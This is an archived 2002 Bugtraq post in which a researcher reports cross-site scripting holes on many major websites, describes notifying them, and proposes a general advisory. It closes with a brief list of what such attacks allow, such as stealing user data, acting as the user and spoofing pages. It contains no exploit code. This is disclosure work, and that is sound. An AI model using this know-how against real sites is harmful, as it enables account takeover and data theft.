[24826] in bugtraq
Cross-site scripting.
daemon@ATHENA.MIT.EDU (Berend-Jan Wever)
Mon Mar 25 21:24:57 2002
Message-ID: <003201c1d2aa$b1ae54b0$1b59a182@grotedoos>
From: "Berend-Jan Wever" <skylined@edup.tudelft.nl>
To: "bugtraq" <bugtraq@securityfocus.com>
Date: Sat, 23 Mar 2002 21:38:30 +0100
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
This messages assumes basic knowledge about Cross-site scripting (CSS) and
it's implications. For a quick summary of its implications see the bottom of
this message first.
I have recently done a "CSS marathon" and found _allmost_ every page I tried
vulnerable within an half an hour. These include microsoft, altavista,
google, cnet, time, ebay, amazon, netscape, yahoo and redhat. This list
probably could have gone on forever if I had taken the time. I have
contacted every one of them about this (except for yahoo and ebay because I
was unable to find a contact emailaddress or feedback form; if it takes
longer to find the contact info than to find the CSS, f#ck 'em) I am now
awaiting their respondses.
But the ease with which I CSS-ed the hell out of everyone of them got me
thinking. I'm not going to be the "beta-tester" slave for the whole
internet. The sites I contacted will probably just patch the one hole I
found so I will probably be able to find others and what about all the sites
I haven't tried yet? Maybe there should be a "general advisory" going out to
every webdesigner out there that CSS is as dangerous as it is common.
Feedback on the usefullness (or futility) of a "general CSS advisory" would
be appreciated.
Berend-Jan Wever
--------------------------------------------
CSS implications
By opening a specially crafted URL in the targetted user's web browser (for
instance when he visits your website or reads an email you sent him).
- read anything that user can read from the CSS-vulnerable site.
(addressbook, personal info, etc...)
- do whatever that user can do on the CSS-vulnerable site (send messages,
order stuff, change personal settings and passwords)
- spoof the contents of the CSS-vulnerable site (make somebody think he is
looking at www.foo.com while the contents of the page actually comes from
your site www.bar.com)
